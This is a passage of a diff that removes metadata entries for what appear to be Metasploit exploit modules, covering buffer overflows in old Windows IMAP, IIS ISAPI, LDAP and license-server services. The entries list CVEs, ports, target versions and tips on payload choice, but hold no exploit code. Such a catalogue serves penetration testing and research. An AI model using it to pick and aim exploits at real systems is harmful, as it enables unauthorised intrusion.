80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/iis/msadc.rb", - "is_install_path": true, - "ref_name": "windows/iis/msadc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/imap/eudora_list": { - "name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", - "fullname": "exploit/windows/imap/eudora_list", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-12-20", - "type": "exploit", - "author": [ - "MC ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!", - "references": [ - "CVE-2005-4267", - "OSVDB-22097", - "BID-15980" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "WorldMail 3 Version 6.1.19.0", - "WorldMail 3 Version 6.1.20.0", - "WorldMail 3 Version 6.1.22.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/eudora_list.rb", - "is_install_path": true, - "ref_name": "windows/imap/eudora_list", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/imail_delete": { - "name": "IMail IMAP4D Delete Overflow", - "fullname": "exploit/windows/imap/imail_delete", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-12", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.", - "references": [ - "CVE-2004-1520", - "OSVDB-11838", - "BID-11675" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP sp0 comctl32.dll" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/imail_delete.rb", - "is_install_path": true, - "ref_name": "windows/imap/imail_delete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/ipswitch_search": { - "name": "Ipswitch IMail IMAP SEARCH Buffer Overflow", - "fullname": "exploit/windows/imap/ipswitch_search", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.", - "references": [ - "CVE-2007-3925", - "OSVDB-36219", - "BID-24962" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/ipswitch_search.rb", - "is_install_path": true, - "ref_name": "windows/imap/ipswitch_search", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_login": { - "name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_login", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-12-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.", - "references": [ - "CVE-2006-6423", - "OSVDB-32125", - "BID-21492" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 2.35 Pro", - "MailEnable 2.34 Pro" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_status": { - "name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_status", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-07-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.", - "references": [ - "CVE-2005-2278", - "OSVDB-17844", - "BID-14243", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=19193" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 1.54 Pro Universal", - "Windows XP Pro SP0/SP1 English", - "Windows 2000 Pro English ALL", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_status.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_status", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_w3c_select": { - "name": "MailEnable IMAPD W3C Logging Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_w3c_select", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.", - "references": [ - "CVE-2005-3155", - "OSVDB-19842", - "BID-15006" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 1.54 Pro Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_w3c_select", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mdaemon_cram_md5": { - "name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow", - "fullname": "exploit/windows/imap/mdaemon_cram_md5", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-11-12", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. This\n vulnerability was discovered by Muts.", - "references": [ - "CVE-2004-1520", - "OSVDB-11838", - "BID-11675" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MDaemon IMAP 8.0.3 Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb", - "is_install_path": true, - "ref_name": "windows/imap/mdaemon_cram_md5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mdaemon_fetch": { - "name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow", - "fullname": "exploit/windows/imap/mdaemon_fetch", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-03-13", - "type": "exploit", - "author": [ - "Jacopo Cervini", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. Credit to Matteo Memelli", - "references": [ - "CVE-2008-1358", - "OSVDB-43111", - "BID-28245", - "EDB-5248" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MDaemon Version 9.6.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mdaemon_fetch.rb", - "is_install_path": true, - "ref_name": "windows/imap/mdaemon_fetch", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercur_imap_select_overflow": { - "name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow", - "fullname": "exploit/windows/imap/mercur_imap_select_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-17", - "type": "exploit", - "author": [ - "Jacopo Cervini " - ], - "description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discover the vulnerability.", - "references": [ - "CVE-2006-1255", - "OSVDB-23950", - "BID-17138" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Server SP4 English", - "Windows 2000 Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercur_imap_select_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercur_login": { - "name": "Mercur Messaging 2005 IMAP Login Buffer Overflow", - "fullname": "exploit/windows/imap/mercur_login", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-17", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.", - "references": [ - "CVE-2006-1255", - "OSVDB-23950", - "BID-17138", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercur_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercur_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercury_login": { - "name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow", - "fullname": "exploit/windows/imap/mercury_login", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-03-06", - "type": "exploit", - "author": [ - "mu-b", - "MC ", - "Ivan Racic" - ], - "description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).", - "references": [ - "CVE-2007-1373", - "EDB-3418" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercury_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercury_login", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercury_rename": { - "name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow", - "fullname": "exploit/windows/imap/mercury_rename", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.", - "references": [ - "CVE-2004-1211", - "OSVDB-12508", - "BID-11775", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=15867" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercury_rename.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercury_rename", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_append": { - "name": "Novell NetMail IMAP APPEND Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_append", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6425", - "OSVDB-31362", - "BID-21723", - "ZDI-06-054" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_append.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_append", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_auth": { - "name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_auth", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-01-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.", - "references": [ - "OSVDB-55175" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_auth.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_status": { - "name": "Novell NetMail IMAP STATUS Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_status", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-11-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2005-3314", - "OSVDB-20956", - "BID-15491" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_status.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_status", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_subscribe": { - "name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_subscribe", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6761", - "OSVDB-31360", - "BID-21728", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_subscribe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms00_094_pbserver": { - "name": "MS00-094 Microsoft IIS Phone Book Service Overflow", - "fullname": "exploit/windows/isapi/ms00_094_pbserver", - "aliases": [], - "rank": 400, - "disclosure_date": "2000-12-04", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. This\n module has only been tested against Windows 2000 SP1.", - "references": [ - "CVE-2000-1089", - "OSVDB-463", - "BID-2048", - "MSB-MS00-094" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP1", - "Windows 2000 SP0", - "Windows NT SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms00_094_pbserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms03_022_nsiislog_post": { - "name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", - "fullname": "exploit/windows/isapi/ms03_022_nsiislog_post", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-06-25", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. This vulnerability was addressed by MS03-022.", - "references": [ - "CVE-2003-0349", - "OSVDB-4535", - "BID-8035", - "MSB-MS03-022", - "URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Brute Force", - "Windows 2000 -MS03-019", - "Windows 2000 +MS03-019", - "Windows XP -MS03-019" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms03_022_nsiislog_post", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms03_051_fp30reg_chunked": { - "name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow", - "fullname": "exploit/windows/isapi/ms03_051_fp30reg_chunked", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular modules works against versions of\n Windows 2000 between SP0 and SP3. Service Pack 4 fixes the\n issue.", - "references": [ - "CVE-2003-0822", - "OSVDB-2952", - "BID-9007", - "MSB-MS03-051" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP0-SP3", - "Windows 2000 07/22/02", - "Windows 2000 10/06/99" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms03_051_fp30reg_chunked", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/rsa_webagent_redirect": { - "name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", - "fullname": "exploit/windows/isapi/rsa_webagent_redirect", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-10-21", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.", - "references": [ - "CVE-2005-4734", - "OSVDB-20151" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "RSA WebAgent 5.2", - "RSA WebAgent 5.3", - "RSA WebAgent 5.2 on Windows 2000 English", - "RSA WebAgent 5.3 on Windows 2000 English", - "RSA WebAgent 5.2 on Windows XP SP0-SP1 English", - "RSA WebAgent 5.3 on Windows XP SP0-SP1 English", - "RSA WebAgent 5.2 on Windows XP SP2 English", - "RSA WebAgent 5.3 on Windows XP SP2 English", - "RSA WebAgent 5.2 on Windows 2003 English SP0", - "RSA WebAgent 5.3 on Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb", - "is_install_path": true, - "ref_name": "windows/isapi/rsa_webagent_redirect", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/w3who_query": { - "name": "Microsoft IIS ISAPI w3who.dll Query String Overflow", - "fullname": "exploit/windows/isapi/w3who_query", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-12-06", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.", - "references": [ - "CVE-2004-1134", - "OSVDB-12258", - "URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html", - "BID-11820" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Detection", - "Windows 2000 RESKIT DLL [Windows 2000]", - "Windows 2000 RESKIT DLL [Windows XP]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/w3who_query.rb", - "is_install_path": true, - "ref_name": "windows/isapi/w3who_query", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ldap/imail_thc": { - "name": "IMail LDAP Service Buffer Overflow", - "fullname": "exploit/windows/ldap/imail_thc", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-02-17", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.", - "references": [ - "CVE-2004-0297", - "OSVDB-3984", - "BID-9682", - "URL-http://web.archive.org/web/20060110155821/http://secunia.com:80/advisories/10880/" - ], - "platform": "Windows", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English", - "Windows 2000 IMail 8.x" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ldap/imail_thc.rb", - "is_install_path": true, - "ref_name": "windows/ldap/imail_thc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ldap/pgp_keyserver7": { - "name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow", - "fullname": "exploit/windows/ldap/pgp_keyserver7", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-07-16", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.", - "references": [ - "CVE-2001-1320", - "OSVDB-4742", - "BID-3046", - "URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/" - ], - "platform": "Windows", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal PGPcertd.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb", - "is_install_path": true, - "ref_name": "windows/ldap/pgp_keyserver7", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/calicclnt_getconfig": { - "name": "Computer Associates License Client GETCONFIG Overflow", - "fullname": "exploit/windows/license/calicclnt_getconfig", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-02", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.", - "references": [ - "CVE-2005-0581", - "OSVDB-14389", - "BID-12705", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" - ], - "platform": "Windows", - "arch": "", - "rport": 10203, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0-1", - "Windows XP English SP2", - "Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/calicclnt_getconfig.rb", - "is_install_path": true, - "ref_name": "windows/license/calicclnt_getconfig", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/calicserv_getconfig": { - "name": "Computer Associates License Server GETCONFIG Overflow", - "fullname": "exploit/windows/license/calicserv_getconfig", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-03-02", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This module exploits an vulnerability in the CA License Server\n network service. By sending an excessively long GETCONFIG\n packet the stack may be overwritten.", - "references": [ - "CVE-2005-0581", - "OSVDB-14389", - "BID-12705", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" - ], - "platform": "Windows", - "arch": "", - "rport": 10202, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0-1", - "Windows XP English SP2", - "Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/calicserv_getconfig.rb", - "is_install_path": true, - "ref_name": "windows/license/calicserv_getconfig", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/flexnet_lmgrd_bof": { - "name": "FlexNet License Server Manager lmgrd Buffer Overflow", - "fullname": "exploit/windows/license/flexnet_lmgrd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-23", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Alexander Gavrun", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.", - "references": [ - "OSVDB-81899", - "BID-52718", - "ZDI-12-052", - "URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt", - "URL-http://www.flexerasoftware.com/pl/13057.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 27000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Debug", - "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", - "Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3", - "Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb", - "is_install_path": true, - "ref_name": "windows/license/flexnet_lmgrd_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/sentinel_lm7_udp": { - "name": "SentinelLM UDP Buffer Overflow", - "fullname": "exploit/windows/license/sentinel_lm7_udp", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-07", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particular popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.", - "references": [ - "CVE-2005-0353", - "OSVDB-14605", 